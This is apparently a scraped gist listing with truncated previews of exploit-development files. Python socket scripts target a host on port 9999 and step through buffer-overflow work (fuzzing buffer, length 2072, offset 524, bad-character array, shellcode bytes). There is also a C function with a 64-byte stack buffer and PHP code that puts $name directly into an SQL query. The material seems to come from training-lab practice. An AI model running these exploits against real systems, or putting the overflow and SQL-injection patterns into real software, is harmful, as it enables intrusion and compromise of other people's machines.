This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| IP = "192.168.100.85" | |
| PORT = 9999 | |
| s = socket.socket() | |
| s.connect((IP,PORT)) | |
| buffer = [ | |
| b"A"*100 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| IP = "192.168.100.85" | |
| PORT = 9999 | |
| s = socket.socket() | |
| s.connect((IP,PORT)) | |
| total_length = 2072 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| IP = "192.168.100.85" | |
| PORT = 9999 | |
| s = socket.socket() | |
| s.connect((IP,PORT)) | |
| total_length = 2072 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| IP = "192.168.100.85" | |
| PORT = 9999 | |
| s = socket.socket() | |
| s.connect((IP,PORT)) | |
| total_length = 2072 | |
| offset = 524 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| from struct import pack | |
| bad_chars = b"".join([pack("<B",x) for x in range(1,256)]) | |
| IP = "192.168.100.85" | |
| PORT = 9999 | |
| s = socket.socket() | |
| s.connect((IP,PORT)) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| from struct import pack | |
| bad_chars = b"".join([pack("<B",x) for x in range(1,256)]) | |
| IP = "192.168.100.85" | |
| PORT = 9999 | |
| s = socket.socket() | |
| s.connect((IP,PORT)) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| from struct import pack | |
| # bad_chars = b"".join([pack("<B",x) for x in range(1,256)]) | |
| IP = "10.10.255.160" | |
| PORT = 9999 | |
| buf = b"" | |
| buf += b"\xdb\xd4\xba\x70\xb3\xd8\x55\xd9\x74\x24\xf4\x5b\x29" | |
| buf += b"\xc9\xb1\x52\x83\xc3\x04\x31\x53\x13\x03\x23\xa0\x3a" | |
| buf += b"\xa0\x3f\x2e\x38\x4b\xbf\xaf\x5d\xc5\x5a\x9e\x5d\xb1" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdlib.h> | |
| #include <unistd.h> | |
| #include <stdio.h> | |
| #include <string.h> | |
| void getpath() | |
| { | |
| char buffer[64]; | |
| unsigned int ret; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $query = "SELECT id, name, inserted, size FROM products | |
| WHERE name = $name"; | |
| $result = odbc_exec($conn, $query); | |
| ?> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $query = "SELECT id, name, inserted, size FROM products | |
| WHERE name = $name""; |
OlderNewer